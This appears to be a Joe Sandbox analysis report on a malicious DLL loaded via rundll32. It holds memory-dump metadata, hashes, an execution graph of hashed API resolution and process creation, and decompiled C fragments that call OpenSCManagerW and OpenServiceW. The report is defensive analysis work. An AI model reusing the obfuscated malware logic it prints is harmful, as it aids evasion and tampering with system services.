                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$Leave$EnterValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3969253408-0
                                                                                                                    • Opcode ID: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                    • Instruction ID: 186a6cd651b3b82d4df79f5272d157dd9dcdda25cd8a7682fbe975f35e4e1d68
                                                                                                                    • Opcode Fuzzy Hash: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                    • Instruction Fuzzy Hash: 51F0FE76604720DFD320CF64DD8880B73ABEB8925135A9555F842D3123E630F8058F61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:15.7%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:1080
                                                                                                                    Total number of Limit Nodes:17
4502 1ddcf7 2 API calls 4502->4511 4504 1e003a 4507 1d8519 GetPEB 4504->4507 4512 1dffb1 4507->4512 4509 1ca8b0 GetPEB 4509->4512 4510 1ca42d GetPEB 4510->4511 4511->4498 4511->4500 4511->4502 4511->4504 4511->4510 4511->4512 4514 1ca8b0 GetPEB 4511->4514 4564 1d8606 4511->4564 4568 1dc0c1 4511->4568 4572 1ced7e 4511->4572 4512->4110 4514->4511 4526 1ccf7e 4515->4526 4517 1d8519 GetPEB 4517->4526 4520 1cd58f 4523 1d8519 GetPEB 4520->4523 4522 1c7ff2 2 API calls 4522->4526 4524 1cd5a6 4523->4524 4524->4110 4525 1ced7e GetPEB 4525->4526 4526->4517 4526->4520 4526->4522 4526->4524 4526->4525 4584 1c7735 4526->4584 4591 1c7e87 4526->4591 4595 1dae6d 4526->4595 4610 1c70b3 4526->4610 4529 1c5577 4527->4529 4530 1c5969 4529->4530 4531 1c5967 4529->4531 4534 1c7ff2 2 API calls 4529->4534 4535 1ced7e GetPEB 4529->4535 4641 1c5e60 4529->4641 4647 1caefb 4529->4647 4532 1d8519 GetPEB 4530->4532 4531->4110 4532->4531 4534->4529 4535->4529 4551 1de406 4536->4551 4537 1df410 4689 1c2b62 4537->4689 4538 1ddcf7 2 API calls 4538->4551 4542 1df426 4542->4110 4546 1ca8b0 GetPEB 4546->4551 4547 1c2b62 GetPEB 4547->4551 4548 1d8519 GetPEB 4548->4551 4551->4537 4551->4538 4551->4542 4551->4546 4551->4547 4551->4548 4552 1c9670 GetPEB 4551->4552 4657 1ddac6 4551->4657 4661 1c88c3 4551->4661 4665 1c75fa 4551->4665 4669 1d408e 4551->4669 4673 1c2ae4 4551->4673 4677 1e09b5 4551->4677 4680 1da2e8 4551->4680 4552->4551 4555 1c4836 4553->4555 4556 1c4b23 4555->4556 4558 1c4b21 4555->4558 4559 1c7ff2 2 API calls 4555->4559 4560 1d847f 4555->4560 4557 1d847f GetPEB 4556->4557 4557->4558 4558->4492 4559->4555 4561 1d84a6 4560->4561 4562 1daa30 GetPEB 4561->4562 4563 1d8502 4562->4563 4563->4555 4565 1d861f 4564->4565 4566 1c7ff2 2 API calls 4565->4566 4567 1d86bc 4566->4567 4567->4511 4569 1dc0e6 4568->4569 4570 1ca42d GetPEB 4569->4570 4571 1dc108 4570->4571 4571->4511 4573 1ced97 4572->4573 4580 1d7a71 4573->4580 4577 1c7f39 4576->4577 4578 1ca42d GetPEB 4577->4578 4579 1c7f55 4578->4579 
4579->4509 4581 1d7a8a 4580->4581 4582 1daa30 GetPEB 4581->4582 4583 1cee00 4582->4583 4583->4511 4587 1c7764 4584->4587 4585 1c7ff2 2 API calls 4585->4587 4586 1c7a10 4586->4526 4587->4585 4587->4586 4588 1e0e3a GetPEB 4587->4588 4589 1c79f3 4587->4589 4588->4587 4617 1e0e3a 4589->4617 4592 1c7e9a 4591->4592 4593 1ced7e GetPEB 4592->4593 4594 1c7f16 4593->4594 4594->4526 4596 1daea5 4595->4596 4599 1dbaf7 4596->4599 4600 1ddcf7 RtlAllocateHeap GetPEB 4596->4600 4601 1c7ff2 2 API calls 4596->4601 4603 1dbaf5 4596->4603 4606 1c9462 GetPEB 4596->4606 4607 1d8519 GetPEB 4596->4607 4609 1ca8b0 GetPEB 4596->4609 4621 1e0b68 4596->4621 4625 1d7b05 4596->4625 4629 1d6bc6 4596->4629 4633 1ca81d 4596->4633 4637 1d828a 4596->4637 4602 1c957d GetPEB 4599->4602 4600->4596 4601->4596 4602->4603 4603->4526 4606->4596 4607->4596 4609->4596 4612 1c70dc 4610->4612 4611 1d5b3b GetPEB 4611->4612 4612->4611 4613 1c74a7 4612->4613 4614 1c7ff2 2 API calls 4612->4614 4615 1c74bb 4612->4615 4616 1d8519 GetPEB 4613->4616 4614->4612 4615->4526 4616->4615 4618 1e0e58 4617->4618 4619 1ced7e GetPEB 4618->4619 4620 1e0f24 4619->4620 4620->4586 4622 1e0b97 4621->4622 4623 1daa30 GetPEB 4622->4623 4624 1e0bfc 4623->4624 4624->4596 4626 1d7b37 4625->4626 4627 1daa30 GetPEB 4626->4627 4628 1d7b8a 4627->4628 4628->4596 4630 1d6bda 4629->4630 4631 1daa30 GetPEB 4630->4631 4632 1d6c3d 4631->4632 4632->4596 4634 1ca83f 4633->4634 4635 1daa30 GetPEB 4634->4635 4636 1ca89d 4635->4636 4636->4596 4638 1d82a9 4637->4638 4639 1daa30 GetPEB 4638->4639 4640 1d8300 4639->4640 4640->4596 4645 1c5e82 4641->4645 4642 1d8519 GetPEB 4642->4645 4643 1c7ff2 2 API calls 4643->4645 4644 1c64bd 4644->4529 4645->4642 4645->4643 4645->4644 4646 1cca90 GetPEB 4645->4646 4646->4645 4649 1caf1c 4647->4649 4648 1dae6d 2 API calls 4648->4649 4649->4648 4650 1cb0b3 4649->4650 4651 1cb0e8 4649->4651 4653 1de274 4650->4653 4651->4529 4654 1de2a0 4653->4654 4655 1daa30 GetPEB 4654->4655 4656 1de312 4655->4656 4656->4651 4658 1ddae5 
4657->4658 4659 1daa30 GetPEB 4658->4659 4660 1ddb32 4659->4660 4660->4551 4662 1c88f5 4661->4662 4663 1daa30 GetPEB 4662->4663 4664 1c8950 4663->4664 4664->4551 4666 1c762c 4665->4666 4667 1daa30 GetPEB 4666->4667 4668 1c7690 4667->4668 4668->4551 4670 1d40b3 4669->4670 4671 1daa30 GetPEB 4670->4671 4672 1d4103 4671->4672 4672->4551 4674 1c2b04 4673->4674 4675 1daa30 GetPEB 4674->4675 4676 1c2b4b 4675->4676 4676->4551 4693 1c94ee 4677->4693 4686 1da519 4680->4686 4681 1c7ff2 RtlAllocateHeap GetPEB 4681->4686 4683 1da634 4684 1da64a 4683->4684 4685 1d8519 GetPEB 4683->4685 4684->4551 4685->4684 4686->4681 4686->4683 4687 1ced7e GetPEB 4686->4687 4688 1d8519 GetPEB 4686->4688 4697 1dc032 4686->4697 4687->4686 4688->4686 4690 1c2b77 4689->4690 4691 1daa30 GetPEB 4690->4691 4692 1c2bce 4691->4692 4692->4542 4694 1c9511 4693->4694 4695 1daa30 GetPEB 4694->4695 4696 1c9566 4695->4696 4696->4551 4698 1dc054 4697->4698 4699 1daa30 GetPEB 4698->4699 4700 1dc0ae 4699->4700 4700->4686 4702 1ce262 4701->4702 4703 1daa30 GetPEB 4702->4703 4704 1ce2c1 4703->4704 4704->4113 4706 1c9623 4705->4706 4723 1d8315 4706->4723 4713 1e11d1 4709->4713 4710 1ddcf7 2 API calls 4710->4713 4711 1d1652 GetPEB 4711->4713 4712 1c7ff2 2 API calls 4712->4713 4713->4710 4713->4711 4713->4712 4714 1ca8b0 GetPEB 4713->4714 4715 1e1380 4713->4715 4718 1e1391 4713->4718 4810 1d7ba6 4713->4810 4714->4713 4717 1d8519 GetPEB 4715->4717 4717->4718 4718->4123 4720 1c92ac 4719->4720 4721 1c92c1 4719->4721 4720->4721 4722 1d8519 GetPEB 4720->4722 4721->4123 4722->4720 4729 1d832d 4723->4729 4725 1d845c 4728 1d8519 GetPEB 4725->4728 4727 1c966a 4727->4123 4728->4727 4729->4725 4729->4727 4730 1c7ff2 2 API calls 4729->4730 4732 1cbb7e 4729->4732 4749 1c4bc7 4729->4749 4754 1d907f 4729->4754 4730->4729 4747 1cc63d 4732->4747 4735 1cca5b 4737 1c957d GetPEB 4735->4737 4739 1cca59 4737->4739 4738 1ca958 GetPEB 4738->4747 4739->4729 4741 1c9462 GetPEB 4741->4747 4744 1ddcf7 RtlAllocateHeap GetPEB 4744->4747 4745 
1ced7e GetPEB 4745->4747 4747->4735 4747->4738 4747->4739 4747->4741 4747->4744 4747->4745 4748 1ca8b0 GetPEB 4747->4748 4763 1caa4d 4747->4763 4767 1cb144 4747->4767 4771 1c1c45 4747->4771 4775 1d4624 4747->4775 4779 1c92c7 4747->4779 4783 1dca69 4747->4783 4787 1c2bd9 4747->4787 4748->4747 4750 1dca69 GetPEB 4749->4750 4751 1c4c44 4750->4751 4752 1d8519 GetPEB 4751->4752 4753 1c4c57 4752->4753 4753->4729 4756 1d947b 4754->4756 4755 1d95cb 4757 1c957d GetPEB 4755->4757 4756->4755 4758 1caa4d GetPEB 4756->4758 4759 1d95c9 4756->4759 4760 1ddcf7 RtlAllocateHeap GetPEB 4756->4760 4761 1c9462 GetPEB 4756->4761 4762 1ca8b0 GetPEB 4756->4762 4757->4759 4758->4756 4759->4729 4760->4756 4761->4756 4762->4756 4764 1caa76 4763->4764 4765 1daa30 GetPEB 4764->4765 4766 1caab9 4765->4766 4766->4747 4768 1cb15f 4767->4768 4769 1daa30 GetPEB 4768->4769 4770 1cb1b8 4769->4770 4770->4747 4772 1c1c76 4771->4772 4773 1daa30 GetPEB 4772->4773 4774 1c1cd0 4773->4774 4774->4747 4776 1d4646 4775->4776 4777 1daa30 GetPEB 4776->4777 4778 1d46a8 4777->4778 4778->4747 4780 1c92e5 4779->4780 4781 1daa30 GetPEB 4780->4781 4782 1c933c 4781->4782 4782->4747 4784 1dca7b 4783->4784 4785 1daa30 GetPEB 4784->4785 4786 1dcad4 4785->4786 4786->4747 4801 1c3757 4787->4801 4788 1c3a7d 4791 1c957d GetPEB 4788->4791 4789 1c7ff2 2 API calls 4789->4801 4790 1d8519 GetPEB 4790->4801 4793 1c3aa2 4791->4793 4792 1c3bbb 4792->4792 4793->4747 4794 1ddcf7 RtlAllocateHeap GetPEB 4794->4801 4795 1ccb52 GetPEB 4795->4801 4796 1c9462 GetPEB 4796->4801 4799 1ca8b0 GetPEB 4799->4801 4800 1e0b68 GetPEB 4800->4801 4801->4788 4801->4789 4801->4790 4801->4792 4801->4794 4801->4795 4801->4796 4801->4799 4801->4800 4802 1dd84c 4801->4802 4806 1c8d13 4801->4806 4803 1dd87f 4802->4803 4804 1daa30 GetPEB 4803->4804 4805 1dd8ca 4804->4805 4805->4801 4807 1c8d41 4806->4807 4808 1daa30 GetPEB 4807->4808 4809 1c8da7 4808->4809 4809->4801 4811 1d7bbf 4810->4811 4812 1c7ff2 2 API calls 4811->4812 4813 1d7c88 4812->4813 4813->4713 
4813->4813 4815 1cf02e 4814->4815 4816 1daa30 GetPEB 4815->4816 4817 1cf082 4816->4817 4817->4138 4819 1cab09 4818->4819 4820 1daa30 GetPEB 4819->4820 4821 1cab6d 4820->4821 4821->4138 4823 1c1fe3 4822->4823 4824 1daa30 GetPEB 4823->4824 4825 1c2045 4824->4825 4825->4138 4827 1daa30 GetPEB 4826->4827 4828 1d5cbb 4827->4828 4828->4149 4830 1d4567 4829->4830 4831 1ca42d GetPEB 4830->4831 4832 1d4587 4831->4832 4832->4149 4837 1d0d2c 4833->4837 4834 1d0da3 4834->4165 4835 1d8519 GetPEB 4835->4837 4836 1c8dc4 GetPEB 4836->4837 4837->4834 4837->4835 4837->4836 4839 1d1e67 2 API calls 4837->4839 4933 1d9e56 4837->4933 4839->4837 4850 1d144a 4840->4850 4841 1d46bb 2 API calls 4841->4850 4842 1d1647 4842->4165 4843 1dda22 GetPEB 4843->4850 4846 1ddcf7 RtlAllocateHeap GetPEB 4846->4850 4848 1c47ce GetPEB 4848->4850 4849 1ca8b0 GetPEB 4849->4850 4850->4841 4850->4842 4850->4843 4850->4846 4850->4848 4850->4849 4941 1cb6cf 4850->4941 4945 1c8969 4850->4945 4949 1cea99 4850->4949 4956 1cab87 4850->4956 4872 1d7703 4852->4872 4854 1dd2ce GetPEB 4854->4872 4856 1d1e67 CloseHandle GetPEB 4856->4872 4858 1dda22 GetPEB 4858->4872 4859 1d7759 4861 1cab87 3 API calls 4859->4861 4860 1d77d7 4860->4165 4863 1d7789 4861->4863 4862 1cb6cf GetPEB 4862->4872 4863->4860 4864 1d1e67 2 API calls 4863->4864 4866 1d77b2 4864->4866 4865 1c8969 GetPEB 4865->4872 4867 1d1e67 2 API calls 4866->4867 4867->4860 4868 1ddcf7 2 API calls 4868->4872 4869 1c47ce GetPEB 4869->4872 4870 1ca8b0 GetPEB 4870->4872 4871 1cea99 3 API calls 4871->4872 4872->4854 4872->4856 4872->4858 4872->4859 4872->4860 4872->4862 4872->4865 4872->4868 4872->4869 4872->4870 4872->4871 4974 1dbb23 4872->4974 4981 1c3de2 4872->4981 4984 1dd389 4872->4984 5014 1d7cdb 4873->5014 4875 1cab87 3 API calls 4892 1d570e 4875->4892 4876 1d8519 GetPEB 4876->4892 4877 1c4816 2 API calls 4877->4892 4878 1d46bb 2 API calls 4878->4892 4879 1d5b08 4880 1d1e67 2 API calls 4879->4880 4881 1d5b06 4880->4881 4881->4165 4882 1dda22 GetPEB 4882->4892 
4883 1ccb52 GetPEB 4883->4892 4885 1cb6cf GetPEB 4885->4892 4887 1c8969 GetPEB 4887->4892 4888 1d453f GetPEB 4888->4892 4889 1ddcf7 RtlAllocateHeap GetPEB 4889->4892 4890 1ca8b0 GetPEB 4890->4892 4891 1c47ce GetPEB 4891->4892 4892->4875 4892->4876 4892->4877 4892->4878 4892->4879 4892->4881 4892->4882 4892->4883 4892->4885 4892->4887 4892->4888 4892->4889 4892->4890 4892->4891 4893 1cea99 3 API calls 4892->4893 5017 1ddedc 4892->5017 5023 1d8727 4892->5023 4893->4892 4904 1cf696 4894->4904 4895 1d46bb 2 API calls 4895->4904 4896 1cf88f 4896->4165 4897 1dda22 GetPEB 4897->4904 4898 1cb6cf GetPEB 4898->4904 4899 1c8969 GetPEB 4899->4904 4900 1ca8b0 GetPEB 4900->4904 4901 1ddcf7 RtlAllocateHeap GetPEB 4901->4904 4902 1cab87 3 API calls 4902->4904 4903 1c47ce GetPEB 4903->4904 4904->4895 4904->4896 4904->4897 4904->4898 4904->4899 4904->4900 4904->4901 4904->4902 4904->4903 4905 1cea99 3 API calls 4904->4905 4905->4904 4912 1c9a55 4906->4912 4907 1c9b63 4907->4165 4908 1c9b65 4910 1d9e56 GetPEB 4908->4910 4910->4907 4912->4907 4912->4908 5027 1c46be 4912->5027 5031 1dc3a0 4912->5031 5039 1c7c37 4912->5039 4915 1d1c8c 4914->4915 4916 1cab87 3 API calls 4915->4916 4917 1d1dd2 4915->4917 4918 1dda22 GetPEB 4915->4918 4919 1cb6cf GetPEB 4915->4919 4920 1c8969 GetPEB 4915->4920 4921 1ddcf7 2 API calls 4915->4921 4922 1c47ce GetPEB 4915->4922 4923 1ca8b0 GetPEB 4915->4923 4924 1cea99 3 API calls 4915->4924 4916->4915 4917->4165 4918->4915 4919->4915 4920->4915 4921->4915 4922->4915 4923->4915 4924->4915 4931 1cba53 4925->4931 4926 1cbb60 4929 1d9e56 GetPEB 4926->4929 4927 1cbb5e 4927->4165 4928 1dc3a0 GetPEB 4928->4931 4929->4927 4930 1c46be GetPEB 4930->4931 4931->4926 4931->4927 4931->4928 4931->4930 4932 1c7c37 GetPEB 4931->4932 4932->4931 4934 1d9e69 4933->4934 4937 1c6bf2 4934->4937 4938 1c6c0c 4937->4938 4939 1daa30 GetPEB 4938->4939 4940 1c6c8f 4939->4940 4940->4837 4942 1cb6e5 4941->4942 4943 1daa30 GetPEB 4942->4943 4944 1cb742 4943->4944 4944->4850 4946 1c8980 
4945->4946 4947 1dd25e GetPEB 4946->4947 4948 1c8a5d 4947->4948 4948->4850 4954 1ceab9 4949->4954 4950 1cecec 4950->4850 4951 1c8f65 2 API calls 4951->4954 4952 1cecd6 4955 1d1e67 2 API calls 4952->4955 4954->4950 4954->4951 4954->4952 4966 1c19b8 4954->4966 4955->4950 4957 1cabb0 4956->4957 4958 1c4b61 GetPEB 4957->4958 4959 1cad67 4958->4959 4970 1c7f5d 4959->4970 4961 1cad99 4962 1cada4 4961->4962 4963 1d1e67 2 API calls 4961->4963 4962->4850 4964 1cadc4 4963->4964 4965 1d1e67 2 API calls 4964->4965 4965->4962 4967 1c19dd 4966->4967 4968 1daa30 GetPEB 4967->4968 4969 1c1a3f 4968->4969 4969->4954 4971 1c7f8e 4970->4971 4972 1daa30 GetPEB 4971->4972 4973 1c7fd4 CreateProcessW 4972->4973 4973->4961 4975 1dbb48 4974->4975 4976 1d1e67 2 API calls 4975->4976 4978 1dbe1d 4975->4978 4980 1c3de2 GetPEB 4975->4980 4994 1e0ac8 4975->4994 4998 1dd8ec 4975->4998 4976->4975 4978->4872 4980->4975 4982 1daa30 GetPEB 4981->4982 4983 1c3e36 4982->4983 4983->4872 4987 1dd3c3 4984->4987 4986 1dd82d 5010 1d9008 4986->5010 4987->4986 4989 1c4b61 GetPEB 4987->4989 4990 1dd82b 4987->4990 4991 1ddcf7 2 API calls 4987->4991 4993 1ca8b0 GetPEB 4987->4993 5002 1dde10 4987->5002 5006 1c4241 4987->5006 4989->4987 4990->4872 4991->4987 4993->4987 4995 1e0af2 4994->4995 4996 1daa30 GetPEB 4995->4996 4997 1e0b4e 4996->4997 4997->4975 4999 1dd8ff 4998->4999 5000 1daa30 GetPEB 4999->5000 5001 1dd96e 5000->5001 5001->4975 5003 1dde56 5002->5003 5004 1daa30 GetPEB 5003->5004 5005 1ddeba 5004->5005 5005->4987 5007 1c4257 5006->5007 5008 1daa30 GetPEB 5007->5008 5009 1c42b3 5008->5009 5009->4987 5011 1d901a 5010->5011 5012 1daa30 GetPEB 5011->5012 5013 1d9074 5012->5013 5013->4990 5015 1daa30 GetPEB 5014->5015 5016 1d7d3e 5015->5016 5016->4892 5021 1ddf09 5017->5021 5018 1de1a5 5019 1e0e3a GetPEB 5018->5019 5020 1de1a3 5019->5020 5020->4892 5021->5018 5021->5020 5022 1c7ff2 2 API calls 5021->5022 5022->5021 5024 1d8758 5023->5024 5025 1daa30 GetPEB 5024->5025 5026 1d87b7 5025->5026 5026->4892 5028 
1c46e5 5027->5028 5029 1daa30 GetPEB 5028->5029 5030 1c4737 5029->5030 5030->4912 5032 1dc3bc 5031->5032 5033 1dc627 5032->5033 5044 1ca3a3 5032->5044 5033->4912 5036 1ced7e GetPEB 5037 1dc5e2 5036->5037 5037->5033 5038 1ced7e GetPEB 5037->5038 5038->5037 5040 1c7c52 5039->5040 5041 1dcadf GetPEB 5040->5041 5042 1c7df1 5040->5042 5048 1c6ca0 5040->5048 5041->5040 5042->4912 5045 1ca3c0 5044->5045 5046 1daa30 GetPEB 5045->5046 5047 1ca41a 5046->5047 5047->5033 5047->5036 5049 1c6cb8 5048->5049 5050 1daa30 GetPEB 5049->5050 5051 1c6d15 5050->5051 5051->5040 5053 1daa30 GetPEB 5052->5053 5054 1cf8f4 5053->5054 5054->4177 5056 1ca9e6 5055->5056 5057 1daa30 GetPEB 5056->5057 5058 1caa3f 5057->5058 5058->4177 5060 1c8ee7 5059->5060 5061 1daa30 GetPEB 5060->5061 5062 1c8f54 5061->5062 5062->4177 5065 1c435e 5063->5065 5064 1c7ff2 2 API calls 5064->5065 5065->5064 5066 1cae64 GetPEB 5065->5066 5067 1c457c 5065->5067 5068 1c45a6 5065->5068 5066->5065 5074 1cae64 5067->5074 5068->4177 5071 1c4e8f 5070->5071 5072 1daa30 GetPEB 5071->5072 5073 1c4ed7 5072->5073 5073->4177 5075 1cae8b 5074->5075 5076 1daa30 GetPEB 5075->5076 5077 1caee2 5076->5077 5077->5068 5083 1d001b 5078->5083 5079 1d8606 2 API calls 5079->5083 5082 1d031b 5082->4183 5083->5079 5083->5082 5085 1ca8b0 GetPEB 5083->5085 5086 1ccd29 5083->5086 5090 1cee81 5083->5090 5095 1c2206 5083->5095 5085->5083 5087 1ccd3f 5086->5087 5088 1daa30 GetPEB 5087->5088 5089 1ccd9f 5088->5089 5089->5083 5099 1d8f15 5090->5099 5092 1ceff7 5092->5083 5096 1c222a 5095->5096 5097 1ca42d GetPEB 5096->5097 5098 1c2249 5097->5098 5098->5083 5100 1d8f34 5099->5100 5101 1daa30 GetPEB 5100->5101 5102 1cefa8 5101->5102 5102->5092 5103 1ddb43 5102->5103 5104 1ddb6c 5103->5104 5105 1daa30 GetPEB 5104->5105 5106 1ddbd4 5105->5106 5106->5092 5108 1c7b13 5107->5108 5109 1daa30 GetPEB 5108->5109 5110 1c7b7c 5109->5110 5110->4192 5112 1d8b6f 5111->5112 5113 1daa30 GetPEB 5112->5113 5114 1d8bd5 5113->5114 5114->3993 5116 1c9df5 5115->5116 5118 
1ca305 5116->5118 5119 1ddcf7 RtlAllocateHeap GetPEB 5116->5119 5121 1ca918 GetPEB 5116->5121 5123 1ca8b0 GetPEB 5116->5123 5124 1c47ce GetPEB 5116->5124 5125 1c9dcf 2 API calls 5116->5125 5126 1c4635 5116->5126 5130 1c7e00 5116->5130 5134 1c8abf 5116->5134 5118->4215 5119->5116 5121->5116 5123->5116 5124->5116 5125->5116 5127 1c464b 5126->5127 5128 1daa30 GetPEB 5127->5128 5129 1c46b0 5128->5129 5129->5116 5131 1c7e18 5130->5131 5132 1daa30 GetPEB 5131->5132 5133 1c7e79 5132->5133 5133->5116 5135 1c8ad1 5134->5135 5136 1daa30 GetPEB 5135->5136 5137 1c8b32 5136->5137 5137->5116 5149 1ce2cc 5138->5149 5142 1c9ba6 5141->5142 5172 1c91dd 5142->5172 5147 1d1e67 2 API calls 5148 1c9d26 5147->5148 5148->4222 5153 1ce2f1 5149->5153 5154 1ce4ef 5153->5154 5156 1c5357 5153->5156 5158 1c5988 5153->5158 5161 1c8e4d 5153->5161 5164 1dc15d 5153->5164 5168 1c2a58 5153->5168 5157 1d1e67 2 API calls 5154->5157 5156->4222 5157->5156 5159 1daa30 GetPEB 5158->5159 5160 1c59db 5159->5160 5160->5153 5162 1d5c73 GetPEB 5161->5162 5163 1c8eb3 5162->5163 5163->5153 5165 1dc176 5164->5165 5166 1daa30 GetPEB 5165->5166 5167 1dc1de 5166->5167 5167->5153 5169 1c2a71 5168->5169 5170 1daa30 GetPEB 5169->5170 5171 1c2ad6 5170->5171 5171->5153 5173 1daa30 GetPEB 5172->5173 5174 1c923b 5173->5174 5174->5148 5175 1c76aa 5174->5175 5176 1c76cd 5175->5176 5177 1daa30 GetPEB 5176->5177 5178 1c7723 5177->5178 5178->5147 5180 1de365 5179->5180 5181 1ca42d GetPEB 5180->5181 5182 1de38d 5181->5182 5182->4233 5184 1c410d 5183->5184 5186 1ddcf7 2 API calls 5184->5186 5187 1c421e 5184->5187 5189 1c421c 5184->5189 5190 1caad6 GetPEB 5184->5190 5191 1ca8b0 GetPEB 5184->5191 5203 1c1f53 5184->5203 5186->5184 5188 1c1fd1 GetPEB 5187->5188 5188->5189 5189->4253 5190->5184 5191->5184 5193 1d6c65 5192->5193 5194 1c4b61 GetPEB 5193->5194 5195 1d6d92 5193->5195 5198 1d6db0 5193->5198 5211 1c9d31 5193->5211 5194->5193 5207 1d6637 5195->5207 5198->4253 5200 1cb1db 5199->5200 5201 1daa30 GetPEB 5200->5201 5202 1cb231 
5201->5202 5202->4245 5204 1c1f6f 5203->5204 5205 1daa30 GetPEB 5204->5205 5206 1c1fc3 5205->5206 5206->5184 5208 1d6659 5207->5208 5209 1daa30 GetPEB 5208->5209 5210 1d66b7 5209->5210 5210->5198 5212 1c9d52 5211->5212 5213 1daa30 GetPEB 5212->5213 5214 1c9dc1 5213->5214 5214->5193 5215 1ce991 5216 1cea8d 5215->5216 5217 1cea62 5215->5217 5221 1cf8fd 5217->5221 5220 1c93ed 2 API calls 5220->5216 5231 1cfde0 5221->5231 5222 1cffd1 5224 1cab87 3 API calls 5222->5224 5223 1c4b61 GetPEB 5223->5231 5225 1cea75 5224->5225 5225->5216 5225->5220 5226 1cf899 GetPEB 5226->5231 5227 1d46bb 2 API calls 5227->5231 5228 1ddcf7 RtlAllocateHeap GetPEB 5228->5231 5229 1dda22 GetPEB 5229->5231 5231->5222 5231->5223 5231->5225 5231->5226 5231->5227 5231->5228 5231->5229 5232 1c47ce GetPEB 5231->5232 5233 1ca8b0 GetPEB 5231->5233 5234 1cb23c 5231->5234 5232->5231 5233->5231 5235 1cb254 5234->5235 5236 1daa30 GetPEB 5235->5236 5237 1cb2b8 lstrcmpiW 5236->5237 5237->5231 5258 1c1993 5259 1c19dd 5258->5259 5260 1daa30 GetPEB 5259->5260 5261 1c1a3f 5260->5261 5283 1c4ee3 5284 1cb6cf GetPEB 5283->5284 5285 1c5133 5284->5285 5286 1cb23c 2 API calls 5285->5286 5287 1c514c 5286->5287 5288 1c51ad 5287->5288 5289 1ddcf7 2 API calls 5287->5289 5290 1c5167 5289->5290 5291 1c47ce GetPEB 5290->5291 5292 1c518e 5291->5292 5293 1ca8b0 GetPEB 5292->5293 5294 1c519b 5293->5294 5295 1d1f8a 2 API calls 5294->5295 5295->5288

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 250 1c912c-1c91af call 1d20b9 call 1daa30 OpenSCManagerW
                                                                                                                    C-Code - Quality: 54%
                                                                                                                    			E001C912C(int __ecx, void* __edx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				void* _t24;
                                                                                                                    				void* _t32;
                                                                                                                    				signed int _t34;
                                                                                                                    				int _t43;
                                                                                                                    
                                                                                                                    				_push(__ecx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				_push(_a20);
                                                                                                                    				_t43 = __ecx;
                                                                                                                    				_push(_a16);
                                                                                                                    				_push(0);
                                                                                                                    				_push(_a8);
                                                                                                                    				_push(0);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E001D20B9(_t24);
                                                                                                                    				_v12 = 0x4657ea;
                                                                                                                    				_t34 = 0x1b;
                                                                                                                    				_v12 = _v12 / _t34;
                                                                                                                    				_v12 = _v12 ^ 0x000ac4f3;
                                                                                                                    				_v8 = 0xb5c996;
                                                                                                                    				_v8 = _v8 >> 4;
                                                                                                                    				_v8 = _v8 * 0x19;
                                                                                                                    				_v8 = _v8 + 0x3329;
                                                                                                                    				_v8 = _v8 ^ 0x01161fa0;
                                                                                                                    				E001DAA30(0x14e, 0x20a9b263, _t34, 0x18e12c58);
                                                                                                                    				_t32 = OpenSCManagerW(0, 0, _t43); // executed
                                                                                                                    				return _t32;
                                                                                                                    			}










                                                                                                                    APIs
                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,000B11AB), ref: 001C91A8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.541549254.00000000001C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 0000000A.00000002.541592520.00000000001E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_1c0000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ManagerOpen
                                                                                                                    • String ID: WF
                                                                                                                    • API String ID: 1889721586-2390014890
                                                                                                                    • Opcode ID: 1ae6c7d6e897e9fd4074bf1914c4816ed8008dd5649bb50acbdcfee0caf21ed1
                                                                                                                    • Instruction ID: 3b6f04e61a8cdad894c52e74e20cd55e9d5f7e12adceb6ce1378df4421671917
                                                                                                                    • Opcode Fuzzy Hash: 1ae6c7d6e897e9fd4074bf1914c4816ed8008dd5649bb50acbdcfee0caf21ed1
                                                                                                                    • Instruction Fuzzy Hash: 05016571901208FBEB08CF99DD4ACAFBFB8EB95714F60809AF404A7200D3B15F109AA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 255 1c42c4-1c4345 call 1d20b9 call 1daa30 OpenServiceW
                                                                                                                    C-Code - Quality: 48%
                                                                                                                    			E001C42C4(void* __ecx, void* __edx, intOrPtr _a4, int _a8, short* _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				void* _t24;
